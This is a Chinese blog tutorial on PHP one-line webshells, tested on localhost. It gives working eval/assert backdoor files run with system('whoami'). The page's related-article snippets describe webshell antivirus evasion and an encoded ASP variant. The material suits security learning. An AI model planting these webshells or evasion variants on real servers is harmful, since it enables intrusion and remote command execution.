一句话木马

最新推荐文章于 2022-07-23 14:00:18 发布
最新推荐文章于 2022-07-23 14:00:18 发布
阅读量302 收藏 1
点赞数
文章标签: php apache mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46831054/article/details/121706239
版权

一句话木马
一:具备网站环境
打开phpstudy,启动Apache和MySQL.
检查网站中网站域名为localhost的网站的状态,若过期,则到管理中点击修改,修改日期。确保该网站的正常运行。

添加附件HackBar:在火狐中打开应用程序菜单,点击扩展和主题,然后点击插件,进入新页面后找到右上角的小齿轮,点击从文件安装附加组件。找到hackbar文件所在路径,添加即可。注意关闭自动更新。

二:创建get.php文件并执行
文件内容为:
php
header(“Content-type:text/html;charset=gbk”);//中文声明代码
@eval($_POST[‘cmd’]);?>
函数eval — 把字符串作为PHP代码执行
注:函数eval()语言结构是 非常危险的,因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外别无方法, 请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据 。

在浏览器中应用:
输入:127.0.0.1/get.php?cmd=system(‘ipconfig’);
可以得到界面
请添加图片描述

二:创建post.php文件并执行
文件内容为:

<?php @eval($_POST['cmd']);?>

在浏览器中应用:
输入:127.0.0.1/post.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作。请添加图片描述

二:创建assert.php文件并执行
文件内容:

<?php header("Content-type:text/html;charset=gbk"); @assert($_POST['cmd']);?>

在浏览器中应用:
输入:127.0.0.1/assert.php?cmd=system(‘whoami’);
可以得到空白界面,即为成功执行。
打开网页控制台,按F2。点击HackBar,进行下图操作

请添加图片描述
请添加图片描述

深渊渔火
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句木马以及免杀
抚琴
01-08 3861
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
一句木马要点和防范注意事项
最新发布
05-24
"一句木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
Apache http 一句
iteye_3911的博客
07-26 137
Apache httpd is very fastest web server for static contents. Apache httpd web server has biggest market share of more than 60% in web server in world. [size=xx-large][color=red]Today apache httpd web ...
探索基于.NET下实现一句木马之asmx篇1
08-03
【.NET下实现一句木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
php一句cmdshell新型 (非一句木马)
10-30
【PHP 一句 CMDShell 新型(非一句木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句木马是直接执行 PHP ...
一句 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
一句木马的原理
枫梓林のBlog
04-22 6323
一句木马的原理 文章目录一句木马的原理0x00 前言0x01 解析 PHP 一句木马的原理0x02 解析蚁剑连接一句木马原理1.蚁剑2.使用蚁剑进行连接0x03 分析蚁剑连接原理0x04 加密的 ASP 一句后门0x04 JSP一句木马0x05 ASPX一句 0x00 前言 常用的一句后门工具分为 ASP、ASP.NET、JSP和 PHP 四种类型 0x01 解析 PHP 一句木马的原理 常用一句木马 php的一句木马: <?php @eval($_POST['pass']);?
Web安全-一句木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句木马到底是什么呢?
一句木马简介
qq_41272376的博客
02-15 6916
一句木马简介 一句木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
复现一句木马
lml_0916的博客
07-23 380
发现了2的值是直接输入的的一些PHP获取文件的函数的字符串,但是assert()函数的参数不可以使用字符串。首先右键添加一个新的数据,将刚刚编写的文件名输入到URL地址中,然后连接密码设置的是2。这样的同时满足了assert()的参数必须是函数和表达式中的一种,和eval语句中有可以传递的参数,所以连接成功。解决的方式就是修改了一下我的php版本,一开始我用实验的版本是7.3.4的,后面改成了5.3.29的版本扣可以了、但是刚刚直接使用eval进行连接的时候是可以连接的,为什么这样替换就不可以了?....
浅析一句木马
coordinate的博客
10-01 4984
一开始对于一句木马感觉很神奇,因为它特别的短,用过的人都知道。分析原理后,又非常想知道到底是什么人想出这么一个好的想法,真的非常的天才。以php一句为例子<?php eval($_POST[c]); ?>我么将这句保存为x.php文件上传到网站中,通过菜刀可以轻松连接。 究其原理其实很简单,看下面这个做法,通过对x.php中的c进行post 菜刀的功能无非是把我们要post的数据传
一句木马的工作原理
liwei8703的专栏
11-19 7万+
<br />一句木马的工作原理:一句木马分析服务端与客户端。<br />"一句木马"服务端(是用于本地的html提交脚本木马文件)<br />就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改<br />"一句木马"客户端(远程服务器上被插入一句的asp可执行文件)<br />用来向服务端
excel一句木马
01-26
Excel一句木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值